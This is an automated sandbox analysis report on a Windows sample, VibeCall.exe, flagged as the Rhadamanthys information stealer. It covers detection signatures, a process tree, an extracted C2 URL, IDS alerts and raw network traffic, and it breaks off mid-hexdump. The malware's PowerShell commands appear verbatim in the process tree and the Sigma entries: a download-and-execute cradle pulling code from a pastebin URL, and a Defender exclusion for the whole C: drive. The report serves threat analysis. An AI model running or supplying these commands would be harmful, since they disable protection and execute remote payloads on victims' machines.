Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VibeCall.exe

Overview

General Information

Sample name:VibeCall.exe
Analysis ID:1627611
MD5:946638e03405c5151c5b4a203fd0e251
SHA1:24f5560acdbd32ea8e9fd3fcbc34f4c62c00d9a1
SHA256:48a2c5750eb3d09f1c9b54becc1b261ce4bb659abecc38bd2bd56e5d20845c9d
Tags:CrazyEvilexeNoLogsMarchuser-g0njxa
Infos:

Detection

RHADAMANTHYS
Score:99
Range:0 - 100
Confidence:100%

Compliance

Score:63
Range:0 - 100

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Drops PE files to the user root directory
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Performs DNS queries to domains with low reputation
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • VibeCall.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\VibeCall.exe" MD5: 946638E03405C5151C5B4A203FD0E251)
    • powershell.exe (PID: 7600 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7792 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1136 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aisolution_vibecall_a.exe (PID: 2692 cmdline: "C:\Users\user\aisolution_vibecall_a.exe" MD5: 55AAEC588AB6793DED2D2DFEC06DDD93)
      • fontdrvhost.exe (PID: 2176 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
        • fontdrvhost.exe (PID: 1352 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
          • WerFault.exe (PID: 6468 cmdline: C:\Windows\system32\WerFault.exe -u -p 1352 -s 140 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • WerFault.exe (PID: 3588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 636 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 944 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 628 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • contry_solution_vibecall_e.exe (PID: 3236 cmdline: "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe" MD5: E94DBC956D2AA25A91FA6D90FDF1AA85)
      • fontdrvhost.exe (PID: 1308 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
      • WerFault.exe (PID: 3152 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 640 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 1664 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 632 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • soundsolution_vibecall_c.exe (PID: 2696 cmdline: "C:\Users\user\AppData\Local\Temp\soundsolution_vibecall_c.exe" MD5: CF3B58083031B698CD957B1116AAB575)
    • videosolution_vibecall_b.exe (PID: 3020 cmdline: "C:\Users\user\videosolution_vibecall_b.exe" MD5: B9C44C022C8BE3B42AC71FA9DBFA67E1)
      • WerFault.exe (PID: 344 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 252 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://171.22.120.233:4955/6519b3d55998bf5e49d571/9uhjmqat.jd8rm"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001A.00000003.2564278865.0000000003250000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    0000000F.00000003.2559956742.00000000011B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      00000010.00000003.2634358521.00000000036C0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000001A.00000003.2576990183.0000000005610000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000010.00000003.2628800917.0000000000A00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            26.3.fontdrvhost.exe.5610000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              32.3.fontdrvhost.exe.5050000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                26.3.fontdrvhost.exe.53f0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  15.3.aisolution_vibecall_a.exe.3980000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    15.3.aisolution_vibecall_a.exe.3980000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 8 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: PowerShell Download and Execution Cradles
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7436, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", ProcessId: 7792, ProcessName: powershell.exe
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7436, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7600, ProcessName: powershell.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7436, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", ProcessId: 7792, ProcessName: powershell.exe
                      Sigma detected: PowerShell Web Download
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7436, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", ProcessId: 7792, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7436, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7600, ProcessName: powershell.exe
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7436, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", ProcessId: 7792, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7436, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7600, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-02T22:13:15.446548+010028033053Unknown Traffic192.168.2.449742188.114.97.380TCP
                      2025-03-02T22:13:20.743419+010028033053Unknown Traffic192.168.2.449743188.114.97.380TCP
                      2025-03-02T22:13:25.939020+010028033053Unknown Traffic192.168.2.449745188.114.97.380TCP
                      2025-03-02T22:13:29.928414+010028033053Unknown Traffic192.168.2.449747104.26.12.20580TCP
                      2025-03-02T22:13:30.536258+010028033053Unknown Traffic192.168.2.449748208.95.112.180TCP
                      2025-03-02T22:13:31.284268+010028033053Unknown Traffic192.168.2.449750188.114.97.380TCP
                      2025-03-02T22:13:35.504999+010028033053Unknown Traffic192.168.2.449778104.26.12.20580TCP
                      2025-03-02T22:13:35.739388+010028033053Unknown Traffic192.168.2.449748208.95.112.180TCP
                      2025-03-02T22:13:39.256174+010028033053Unknown Traffic192.168.2.449803104.26.12.20580TCP
                      2025-03-02T22:13:39.364565+010028033053Unknown Traffic192.168.2.449748208.95.112.180TCP
                      2025-03-02T22:13:46.005051+010028033053Unknown Traffic192.168.2.449860104.26.12.20580TCP
                      2025-03-02T22:13:46.130101+010028033053Unknown Traffic192.168.2.449748208.95.112.180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-02T22:14:06.616490+010028548021Domain Observed Used for C2 Detected171.22.120.2334955192.168.2.449998TCP
                      2025-03-02T22:14:17.119830+010028548021Domain Observed Used for C2 Detected79.141.168.82113192.168.2.450055TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-02T22:12:49.223159+010018100002Potentially Bad Traffic192.168.2.449740104.20.4.235443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\soundsolution_vibecall_c.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Found malware configuration
                      Source: 15.3.aisolution_vibecall_a.exe.1130000.8.unpackMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://171.22.120.233:4955/6519b3d55998bf5e49d571/9uhjmqat.jd8rm"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeReversingLabs: Detection: 45%
                      Source: C:\Users\user\aisolution_vibecall_a.exeReversingLabs: Detection: 45%
                      Source: C:\Users\user\videosolution_vibecall_b.exeReversingLabs: Detection: 45%
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

                      Compliance

                      barindex
                      PE / OLE file has a valid certificate
                      Source: VibeCall.exeStatic PE information: certificate valid
                      Uses secure TLS version for HTTPS connections
                      Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Contains modern PE file flags such as dynamic base (ASLR) or NX
                      Source: VibeCall.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Binary contains paths to debug symbols
                      Source: Binary string: wkernel32.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2562039423.0000000003760000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2562167837.0000000003880000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2563032067.0000000003980000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2562816443.0000000003760000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 00000010.00000003.2634358521.00000000036C0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2560910656.0000000003760000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2561129278.0000000003950000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2561507677.0000000003760000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2561730228.0000000003900000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2560910656.0000000003760000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2561129278.0000000003950000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2561507677.0000000003760000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2561730228.0000000003900000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: VibeCall.exe, 00000000.00000000.1748740065.00007FF7C2A0D000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2563032067.0000000003980000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2562816443.0000000003760000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 00000010.00000003.2634358521.00000000036C0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2562039423.0000000003760000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2562167837.0000000003880000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: VibeCall.exe, 00000000.00000000.1748961023.00007FF7C2C12000.00000002.00000001.01000000.00000003.sdmp
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp37_2_000001D03B7F0511

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 171.22.120.233:4955 -> 192.168.2.4:49998
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 79.141.168.8:2113 -> 192.168.2.4:50055
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://171.22.120.233:4955/6519b3d55998bf5e49d571/9uhjmqat.jd8rm
                      Connects to a pastebin service (likely for C&C)
                      Source: unknownDNS query: name: pastebin.com
                      Performs DNS queries to domains with low reputation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeDNS query: api.mirrow1-dell.xyz
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49793
                      Source: global trafficTCP traffic: 192.168.2.4:49761 -> 147.45.60.20:5000
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Mar 2025 21:13:15 GMTContent-Type: application/octet-streamContent-Length: 17363140Connection: keep-aliveLast-Modified: Thu, 27 Feb 2025 17:17:12 GMTETag: "67c09e18-108f0c4"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 756Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2hIGSBeGy88n8egK4DhRAeYZLFzRRBOtFPBfPAlJcQCDF4UjvUsQehruPpCCK8osEYEQktwDXPpSrcymTMhzJc%2FOoDiXi5fxoVHligDhi9T9J3UU4pLxMnX5XhRs7Y6Fz%2FlgwutIFKwr%2Bdw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91a3e59f2bdc42ce-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1614&rtt_var=807&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=85&delivery_rate=0&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 d8 46 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*F
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Mar 2025 21:13:20 GMTContent-Type: application/octet-streamContent-Length: 17235932Connection: keep-aliveLast-Modified: Thu, 27 Feb 2025 17:14:54 GMTETag: "67c09d8e-106ffdc"Cache-Control: max-age=14400CF-Cache-Status: MISSAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tnyg%2Frr515%2FsJk2hdG%2FEhUG%2FZJ1OObc5vIFhgNbOEAq7zMApq9%2F9mLSYA3TrR82OdCxRkD5J%2B7oGzAkR0bGGZSp1zRPGQ56UO2F1ZNSewdvoZZGcp7zvbylhOxdfoD7LxakNSzdbu1BjkXU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91a3e5bdd9c7b886-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1748&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=90&delivery_rate=0&cwnd=83&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 ea 44 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*D
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Mar 2025 21:13:25 GMTContent-Type: application/octet-streamContent-Length: 16403908Connection: keep-aliveLast-Modified: Fri, 28 Feb 2025 15:05:18 GMTETag: "67c1d0ae-fa4dc4"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2YzefEDplcteZAced036LEyXAhOlOX5c4ICV9B05u5CpIVNXTtZCxP1FKNCzz%2BCQTPbi5aOqg1MjV8sUwxFoYeGH%2FF6KUDVKBS1T9k0ecXLVvP9MLEYZWFokKQJQ%2Bjc4UVZ2w36G5pvyYAM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91a3e5de4d998cc0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1942&rtt_var=971&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 